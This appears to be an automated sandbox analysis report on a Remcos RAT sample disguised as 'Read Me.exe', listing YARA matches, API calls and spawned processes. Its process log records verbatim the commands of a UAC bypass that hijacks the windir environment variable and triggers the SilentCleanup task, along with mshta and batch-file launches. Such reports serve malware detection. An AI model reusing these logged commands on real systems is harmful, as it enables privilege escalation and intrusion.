Source: 18.2.Dprgees.exe.2c20000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 18.2.Dprgees.exe.2c20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 19.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 19.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Contains functionality to call native functionsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00401808 NtdllDefWindowProc_A,16_2_00401808
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0040174E NtdllDefWindowProc_A,16_2_0040174E
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D1E8
Detected potential crypto functionShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D1E812_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_004050C215_2_004050C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_004014AB15_2_004014AB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_0040513315_2_00405133
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_004051A415_2_004051A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_0040124615_2_00401246
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_0040CA4615_2_0040CA46
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_0040523515_2_00405235
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_004032C815_2_004032C8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_0040168915_2_00401689
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_00402F6015_2_00402F60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00404DE516_2_00404DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00404E5616_2_00404E56
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00404EC716_2_00404EC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00404F5816_2_00404F58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0040BF6B16_2_0040BF6B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0041C30B16_2_0041C30B
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 00412084 appears 39 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 00413956 appears 47 times
PE file contains strange resourcesShow sources
Source: Read Me.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Read Me.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Read Me.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Read Me.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dprgees.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Dprgees.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dprgees.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dprgees.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: Read Me.exeBinary or memory string: OriginalFilename vs Read Me.exe
Source: Read Me.exe, 00000000.00000002.1135239553.00000000043B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Read Me.exe
Source: Read Me.exe, 00000000.00000002.1124603620.0000000000700000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs Read Me.exe
Source: Read Me.exe, 00000000.00000002.1135109650.0000000004250000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Read Me.exe
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Uses reg.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Yara signature matchShow sources
Source: 0000000C.00000002.1501343560.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.1501343560.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000000B.00000002.1156091157.00000000044E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1156091157.00000000044E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000012.00000002.1187525190.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000002.1187525190.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000010.00000002.1167594919.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000013.00000002.1180206351.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.1180206351.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 11.2.Dprgees.exe.44e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.Dprgees.exe.44e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 11.2.Dprgees.exe.44e0000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.Dprgees.exe.44e0000.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 18.2.Dprgees.exe.2c20000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.Dprgees.exe.2c20000.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 18.2.Dprgees.exe.2c20000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.Dprgees.exe.2c20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 19.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 19.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@35/10@2/2
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0040EB33
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,15_2_00410DE1
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_00405AC8 GetDiskFreeSpaceA,10_2_00405AC8
Contains functionality to enum processes or threadsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00409AA0 GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00409AA0
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00409D73 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_00409D73
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_004111A9
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\Read Me.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PKAQFTEH\1pPDL3bVPKcRW5oANFuDWLxxLlrJBV2jZ[1].htmJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\Fixed-S5LK5J
Creates temporary filesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile created: C:\Users\user\AppData\Local\Temp\vnyefbbqtJump to behavior
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\Read Me.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Read Me.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Read Me.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgest.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgest.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Dprg\Dprgees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Reads ini filesShow sources
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Read Me.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\Read Me.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Read Me.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Read Me.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Read Me.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Read Me.exeVirustotal: Detection: 13%
Source: Read Me.exeReversingLabs: Detection: 22%
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\Read Me.exeFile read: C:\Users\user\Desktop\Read Me.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Read Me.exe 'C:\Users\user\Desktop\Read Me.exe'
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Dprg\Dprg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Users\user\Dprg\Dprgest.exe 'C:\Users\user\Dprg\Dprgest.exe'
Source: unknownProcess created: C:\Users\user\Dprg\Dprgees.exe Dprgees.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Dprg\Dprg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe' /stext 'C:\Users\user\AppData\Local\Temp\lstte'
